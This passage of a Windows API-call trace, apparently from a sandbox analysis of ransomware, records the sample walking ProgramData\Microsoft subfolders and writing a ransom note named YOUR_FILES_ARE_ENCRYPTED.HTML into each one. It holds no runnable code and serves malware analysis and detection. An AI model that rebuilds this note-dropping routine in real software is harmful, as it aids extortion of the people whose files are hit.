lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.306] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.306] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.306] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.306] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0106.306] GetProcessHeap () returned 0x600000 [0106.306] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.306] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Sideload\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\sideload\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.307] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.308] CloseHandle (hObject=0x314) returned 1 [0106.309] GetProcessHeap () returned 0x600000 [0106.309] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.309] GetProcessHeap () returned 0x600000 [0106.309] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.310] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Siufloc", cAlternateFileName="")) returned 1 [0106.310] StrStrIW (lpFirst="Siufloc", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.310] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc") returned 46 [0106.310] GetProcessHeap () returned 0x600000 [0106.310] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.311] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc" [0106.311] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\*" [0106.311] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.312] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.312] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.312] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0106.312] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0106.312] GetProcessHeap () returned 0x600000 [0106.312] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.312] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\Siufloc\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\siufloc\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.313] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.314] CloseHandle (hObject=0x314) returned 1 [0106.315] GetProcessHeap () returned 0x600000 [0106.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.315] GetProcessHeap () returned 0x600000 [0106.315] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.316] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="SoftLanding", cAlternateFileName="SOFTLA~1")) returned 1 [0106.316] StrStrIW (lpFirst="SoftLanding", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.316] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding") returned 50 [0106.316] GetProcessHeap () returned 0x600000 [0106.316] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.317] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding" [0106.317] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\*" [0106.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.317] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.317] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.318] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.318] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 80 [0106.318] GetProcessHeap () returned 0x600000 [0106.318] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLanding\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlanding\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.319] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.320] CloseHandle (hObject=0x314) returned 1 [0106.324] GetProcessHeap () returned 0x600000 [0106.324] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.324] GetProcessHeap () returned 0x600000 [0106.324] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.325] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 1 [0106.325] StrStrIW (lpFirst="SoftLandingStage", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.325] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage") returned 55 [0106.325] GetProcessHeap () returned 0x600000 [0106.325] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.326] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage" [0106.327] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\*" [0106.327] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.327] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.327] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.327] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.327] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0106.327] GetProcessHeap () returned 0x600000 [0106.327] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.328] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\SoftLandingStage\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\softlandingstage\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.328] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.329] CloseHandle (hObject=0x314) returned 1 [0106.330] GetProcessHeap () returned 0x600000 [0106.330] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.330] GetProcessHeap () returned 0x600000 [0106.330] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0106.331] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="SoftLandingStage", cAlternateFileName="SOFTLA~2")) returned 0 [0106.331] FindClose (in: hFindFile=0x6266b8 | out: hFindFile=0x6266b8) returned 1 [0106.331] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 68 [0106.331] GetProcessHeap () returned 0x600000 [0106.332] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.332] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Diagnosis\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\diagnosis\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.332] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0106.334] CloseHandle (hObject=0x308) returned 1 [0106.334] GetProcessHeap () returned 0x600000 [0106.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.334] GetProcessHeap () returned 0x600000 [0106.334] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0106.335] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="DRM", cAlternateFileName="")) returned 1 [0106.335] StrStrIW (lpFirst="DRM", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.335] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned 32 [0106.335] GetProcessHeap () returned 0x600000 [0106.335] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0106.336] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM" [0106.336] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*" [0106.336] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0106.337] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Server", cAlternateFileName="")) returned 1 [0106.337] StrStrIW (lpFirst="Server", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.337] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned 39 [0106.337] GetProcessHeap () returned 0x600000 [0106.337] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6b47b0 [0106.338] lstrcpyW (in: lpString1=0x6b47b0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server" [0106.338] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*" [0106.338] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623b48, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x6268f8 [0106.338] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623b48, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.339] FindNextFileW (in: hFindFile=0x6268f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623b48, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 0 [0106.339] FindClose (in: hFindFile=0x6268f8 | out: hFindFile=0x6268f8) returned 1 [0106.339] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 69 [0106.339] GetProcessHeap () returned 0x600000 [0106.339] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.339] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DRM\\Server\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\drm\\server\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.340] WriteFile (in: hFile=0x314, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.341] CloseHandle (hObject=0x314) returned 1 [0106.342] GetProcessHeap () returned 0x600000 [0106.342] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.342] GetProcessHeap () returned 0x600000 [0106.342] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: 